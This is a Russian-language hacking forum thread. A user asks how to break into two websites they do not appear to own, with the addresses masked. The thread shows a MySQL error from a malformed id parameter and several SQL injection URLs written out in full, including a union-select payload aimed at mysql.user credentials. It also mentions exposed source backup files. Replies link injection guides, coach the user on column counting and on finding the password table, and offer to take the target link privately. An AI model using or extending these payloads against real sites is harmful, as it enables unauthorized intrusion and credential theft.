|
Какие уязвимости могут быть?
Какие уязвимости могут быть у обычного локального сайта не php nuke не joomla а которые сами писали :D :confused:
Вообщем есть сайт http://***.***.**.**/ пишу http://***.***.**.**/movie.php?id=1 нечего... а стоит прописать http://***.***.**.**/movie.php?id=1%60 появляеться Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/movie.php on line 198 Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/movie.php on line 199 Что могу сделать? :rolleyes: И есть ещё один сайт там вообще нету уязвимостей ну хз вот примерно http://***.***.**.**/files/rules.htm - обычная страница а пишеш http://***.***.**.**/ без "rules.php"! Там файлы "lol.php~","a.super" ну т.е. всё чо включены в сайты даже заходиш весь код html виден =) (Что можно сделать по двум разным сайтам,ЗАРАНЕЕ ОГРОМНОЕ СПАСИБО)! :( |
по первому читай:
https://forum.antichat.ru/threadnav43966-1-10.html https://forum.antichat.ru/threadnav19605-1-10.html |
Цитата:
http://xxx/movie.php?id=-1 нечего нету http://xxx/movie.php?id=9999999 нечего нету пишу опять http://xxx/movie.php?id=1' UNION SELECT 1,2,3,4,5,6 -- ошибка таже пишу http://xxx/movie.php?id=0 ошибок нету http://xxx/movie.php?id='1'; ошибка пишу http://xxx/movie.php?page=-1+union+select+null,null/* ошибка пишу http://xxx/movie.php?page=99999+union+select+null,null/* page=-1+union+select+null,null,null,null,null,null/* ошибка http://xxx/movie.php?page=-1+union+select+1,2,user,password,5,6+from+mysql.us er/* нечего не проиходит тажа ошибка... |
ты количество столбцов правильно подбери(ссылки на маны по этому у тебя уже есть), а потом и имя таблицы с пассами. а то ты как-то от фонаря всё делаешь.
|
так пишу ' Group By 99999 -- сравно одна и тажа ошибка сколько там миллион столбцов =) ? :(
(сор если я тупой вопрос задал) |
кинь ссылку сюда или в пм
|
Цитата:
|
| Время: 22:30 |